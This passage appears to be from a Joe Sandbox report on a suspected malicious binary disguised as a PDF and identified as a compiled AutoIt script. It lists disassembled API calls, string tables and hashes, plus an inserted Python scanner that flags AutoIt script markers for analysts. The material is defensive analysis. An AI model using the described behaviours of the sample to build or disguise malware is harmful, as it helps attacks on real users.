                                                    • GetMonitorInfoW.USER32 ref: 003A7970
                                                    • CopyRect.USER32(?,?), ref: 003A7987
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 003A79F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                                    • Instruction ID: 995399b566d8b35c13ad8fd5683c7981b9e473cb6e5471d01f55ed232eaaa833
                                                    • Opcode Fuzzy Hash: f36bc88da0c808741a71d6111c04c7fb68f2d90915bd09b215abb230dc57b395
                                                    • Instruction Fuzzy Hash: B1B18F71608300AFD706DF64CD89B6ABBE8FF89310F008A1DF5999B291D774E805CB91
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A939
                                                    • GetSystemMetrics.USER32(00000007), ref: 0035A941
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0035A96C
                                                    • GetSystemMetrics.USER32(00000008), ref: 0035A974
                                                    • GetSystemMetrics.USER32(00000004), ref: 0035A999
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0035A9B6
                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0035A9C6
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0035A9F9
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0035AA0D
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 0035AA2B
                                                    • GetStockObject.GDI32(00000011), ref: 0035AA47
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0035AA52
                                                      • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                                      • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                                      • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                                      • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                                    • SetTimer.USER32(00000000,00000000,00000028,0035AB87), ref: 0035AA79
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI$T.?
                                                    • API String ID: 1458621304-528744971
                                                    • Opcode ID: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                                    • Instruction ID: e7f06b4c6e7486d52aa2978f913bdd9ebaff8b7947ac020ab25c0cfee2af9d8f
                                                    • Opcode Fuzzy Hash: 9070007c45f26d3d5cfdf786a4cf5899bab599345bcc4b0abb1dfe668013abf3
                                                    • Instruction Fuzzy Hash: E5B16A71A0020A9FDB16DFA8DD45FEE7BA8EB08315F114229FA15E72A0DB74E840CB55
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A3735
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,003DDC00,00000000,?,00000000,?,?), ref: 003A37A3
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003A37EB
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003A3874
                                                    • RegCloseKey.ADVAPI32(?), ref: 003A3B94
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 003A3BA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: f52927d55df4560a87690a1afd992c1bc4ba7115a28eb19002e2e04fb4223d84
                                                    • Instruction ID: 857f2c6de29c17f4b0d71bdc74fd1da7883173eb41765f74bcab4562785143ad
                                                    • Opcode Fuzzy Hash: f52927d55df4560a87690a1afd992c1bc4ba7115a28eb19002e2e04fb4223d84
                                                    • Instruction Fuzzy Hash: A80237756046019FCB16EF14C851E2AB7E9FF8A720F05845DF99A9F2A2CB30ED01CB81
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A6C56
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003A6D16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                                    • Instruction ID: c44d1d38829a9b567b955afdf4672e5f4c6d849eec5010892bdb2cd9dc6cd4ea
                                                    • Opcode Fuzzy Hash: 3d2b1a2dcb23c18d39a81a753d57928218851f9e0b28f015ff7caa1bbf05b776
                                                    • Instruction Fuzzy Hash: AEA17D342042419FCB16EF20C952E6BB3A5EF45354F148969F9969F3A2DB70ED09CB41
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037CF91
                                                    • __swprintf.LIBCMT ref: 0037D032
                                                    • _wcscmp.LIBCMT ref: 0037D045
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037D09A
                                                    • _wcscmp.LIBCMT ref: 0037D0D6
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0037D10D
                                                    • GetDlgCtrlID.USER32(?), ref: 0037D15F
                                                    • GetWindowRect.USER32(?,?), ref: 0037D195
                                                    • GetParent.USER32(?), ref: 0037D1B3
                                                    • ScreenToClient.USER32(00000000), ref: 0037D1BA
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0037D234
                                                    • _wcscmp.LIBCMT ref: 0037D248
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0037D26E
                                                    • _wcscmp.LIBCMT ref: 0037D282
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                    • String ID: %s%u
                                                    • API String ID: 3119225716-679674701
                                                    • Opcode ID: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                                    • Instruction ID: 0b8f76c16437af52a52560acc03b6ca6f295bc201bbd435b8cae06382826cd4b
                                                    • Opcode Fuzzy Hash: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                                    • Instruction Fuzzy Hash: 0CA1CF31204306AFD726DF64C884FAAB7E8FF44314F008929F99DD6191EB34EA56CB91
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0037D8EB
                                                    • _wcscmp.LIBCMT ref: 0037D8FC
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037D924
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0037D941
                                                    • _wcscmp.LIBCMT ref: 0037D95F
                                                    • _wcsstr.LIBCMT ref: 0037D970
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037D9A8
                                                    • _wcscmp.LIBCMT ref: 0037D9B8
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037D9DF
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037DA28
                                                    • _wcscmp.LIBCMT ref: 0037DA38
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0037DA60
                                                    • GetWindowRect.USER32(00000004,?), ref: 0037DAC9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                                    • Instruction ID: 6f339d26bf3c7a0734b8863c596734635a60832793add35a6e293d3723c2c10b
                                                    • Opcode Fuzzy Hash: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                                    • Instruction Fuzzy Hash: 038191310083059BDB22DF14C985FAA7BE8FF85314F058469FD8A9A095DB38ED45CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 2c09ba05259beb14da67422457a383d306be705c64c03e0d1dbcf50555e6b0fb
                                                    • Instruction ID: 0e1d5a19953cf04874f210f86645aed5cf8457dbc5ed8036970a851c52185ee9
                                                    • Opcode Fuzzy Hash: 2c09ba05259beb14da67422457a383d306be705c64c03e0d1dbcf50555e6b0fb
                                                    • Instruction Fuzzy Hash: B7314F31A44209EADB2BEE50DE53EEE73B89F20710F204129F9557D0E5EB55AE04C652
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0037EAB0
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0037EAC2
                                                    • SetWindowTextW.USER32(?,?), ref: 0037EAD9
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037EAEE
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0037EAF4
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EB04
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0037EB0A
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0037EB2B
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0037EB45
                                                    • GetWindowRect.USER32(?,?), ref: 0037EB4E
                                                    • SetWindowTextW.USER32(?,?), ref: 0037EBB9
                                                    • GetDesktopWindow.USER32 ref: 0037EBBF
                                                    • GetWindowRect.USER32(00000000), ref: 0037EBC6
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0037EC12
                                                    • GetClientRect.USER32(?,?), ref: 0037EC1F
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0037EC44
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0037EC6F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                                    • Instruction ID: 39cda3c6a697ca2337cc38e58a1171a5f9f2bc809f7184b0dccb1cb79b7dd885
                                                    • Opcode Fuzzy Hash: 6f0b6abd46a7001f5aadb42b08d665a40024e672a914b82b0a749e09760e9603
                                                    • Instruction Fuzzy Hash: C0513E71900709EFDB229FA8CD89F6EBBB9FF08705F014968E586A65A0C774B954CB10
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 003979C6
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 003979D1
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 003979DC
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 003979E7
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 003979F2
                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 003979FD
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00397A08
                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00397A13
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00397A1E
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00397A29
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00397A34
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00397A3F
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00397A4A
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00397A55
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00397A60
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00397A6B
                                                    • GetCursorInfo.USER32(?), ref: 00397A7B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load$Info
                                                    • String ID:
                                                    • API String ID: 2577412497-0
                                                    • Opcode ID: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                                    • Instruction ID: 1b130968be9272ff62e6572bb23cec31e4df6dd993529a517a355476f572175b
                                                    • Opcode Fuzzy Hash: 694829a61f14b06ba95ccbcea83713461934d0e091c4bc68ec55f874e73e4d9e
                                                    • Instruction Fuzzy Hash: 663105B1D4831A6ADF119FB68C8995FBFE8FF04750F50453AE50DE7281DA78A5008FA1
                                                    APIs
                                                      • Part of subcall function 0035E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0034C8B7,?,00002000,?,?,00000000,?,0034419E,?,?,?,003DDC00), ref: 0035E984
                                                      • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                                    • __wsplitpath.LIBCMT ref: 0034C93E
                                                      • Part of subcall function 00361DFC: __wsplitpath_helper.LIBCMT ref: 00361E3C
                                                    • _wcscpy.LIBCMT ref: 0034C953
                                                    • _wcscat.LIBCMT ref: 0034C968
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0034CABE
                                                      • Part of subcall function 0034B337: _wcscpy.LIBCMT ref: 0034B36F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 2258743419-1018226102
                                                    • Opcode ID: b7aede0a033ebdf18e471edac6fa4ce50b2360f41b6cd76307d5280ca7d2dd37
                                                    • Instruction ID: 2d3abcfc1a530c2cccd2077b6643a34c49ca3d99964cf7595693e0e1e50c7208
                                                    • Opcode Fuzzy Hash: b7aede0a033ebdf18e471edac6fa4ce50b2360f41b6cd76307d5280ca7d2dd37
                                                    • Instruction Fuzzy Hash: 461283715083419FC726EF24C841AAFBBE5FF99304F44492DF5899B261DB30EA49CB52
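The string table of the function above (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", "#include depth exceeded ...") is the AutoIt interpreter's own check for an embedded compiled script, and it is the evidence behind the "Binary is likely a compiled AutoIt script file" verdict in the signature list. The scanner below is an added example, not code from the report or from AutoIt: it searches a byte buffer for those markers and reports their offsets, so the same check can be run over a dropped file before it is detonated. The sample bytes are constructed for the demonstration; whether a given binary stores the marker as ASCII or as UTF-16LE is an assumption, so both encodings are checked.

```python
import re

# Markers taken from the interpreter's string table above.  "AU3!EA06" is the
# script-resource signature of a compiled AutoIt v3 script; ">>>AUTOIT SCRIPT<<<"
# is the older marker.  The UTF-16LE forms are an assumption: the interpreter is
# a wide-character build, so a marker may appear in either encoding.
AUTOIT_MARKERS = {
    "AU3!EA06": b"AU3!EA06",
    "AU3!EA06 (utf-16le)": "AU3!EA06".encode("utf-16-le"),
    ">>>AUTOIT SCRIPT<<<": b">>>AUTOIT SCRIPT<<<",
    ">>>AUTOIT SCRIPT<<< (utf-16le)": ">>>AUTOIT SCRIPT<<<".encode("utf-16-le"),
}


def find_autoit_markers(data: bytes) -> dict:
    """Return {marker_name: [offset, ...]} for every marker present in data."""
    hits = {}
    for name, needle in AUTOIT_MARKERS.items():
        offsets = [m.start() for m in re.finditer(re.escape(needle), data)]
        if offsets:
            hits[name] = offsets
    return hits


def is_probably_compiled_autoit(data: bytes) -> bool:
    """True when at least one compiled-script marker is present."""
    return bool(find_autoit_markers(data))


def scan_file(path: str) -> dict:
    """Convenience wrapper: scan a file on disk (e.g. a dropped executable)."""
    with open(path, "rb") as fh:
        return find_autoit_markers(fh.read())


# Constructed stand-in for a binary: a fake DOS/PE header, padding, the ASCII
# script signature at offset 108 and the wide legacy marker at offset 132.
SAMPLE = (
    b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 40
    + b"AU3!EA06" + b"\x01" * 16
    + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le") + b"\x00" * 8
)

# Plain data with no marker, to show the negative case.
CLEAN = b"MZ" + b"\x00" * 200

if __name__ == "__main__":
    for name, offsets in find_autoit_markers(SAMPLE).items():
        print(f"{name}: {[hex(o) for o in offsets]}")
    print("compiled AutoIt:", is_probably_compiled_autoit(SAMPLE))
```

A hit on "AU3!EA06" is enough to justify pulling the script out with an AutoIt extractor before any further dynamic analysis; the marker search alone does not recover the script body.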
                                                    APIs
                                                    • _memset.LIBCMT ref: 003ACEFB
                                                    • DestroyWindow.USER32(?,?), ref: 003ACF73
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003ACFF4
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AD016
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD025
                                                    • DestroyWindow.USER32(?), ref: 003AD042
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00340000,00000000), ref: 003AD075
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AD094
                                                    • GetDesktopWindow.USER32 ref: 003AD0A9
                                                    • GetWindowRect.USER32(00000000), ref: 003AD0B0
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AD0C2
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AD0DA
                                                      • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 3877571568-3619404913
                                                    • Opcode ID: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                                    • Instruction ID: c6e2130b3dc8896fd1a3756a632261699c0fab780b05e397009c2779a3256c7a
                                                    • Opcode Fuzzy Hash: 94be17654b0db67ba8c045c16fa1c8cd016cc1224ab7645e66319d3cceb9ab89
                                                    • Instruction Fuzzy Hash: DB71DFB0140305AFD722CF28CC85FA677E9FB89704F44492DF9869B2A1DB35E942CB16
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DragQueryPoint.SHELL32(?,?), ref: 003AF37A
                                                      • Part of subcall function 003AD7DE: ClientToScreen.USER32(?,?), ref: 003AD807
                                                      • Part of subcall function 003AD7DE: GetWindowRect.USER32(?,?), ref: 003AD87D
                                                      • Part of subcall function 003AD7DE: PtInRect.USER32(?,?,003AED5A), ref: 003AD88D
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF3E3
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AF3EE
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AF411
                                                    • _wcscat.LIBCMT ref: 003AF441
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AF458
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AF471
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF488
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AF4AA
                                                    • DragFinish.SHELL32(?), ref: 003AF4B1
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AF59C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
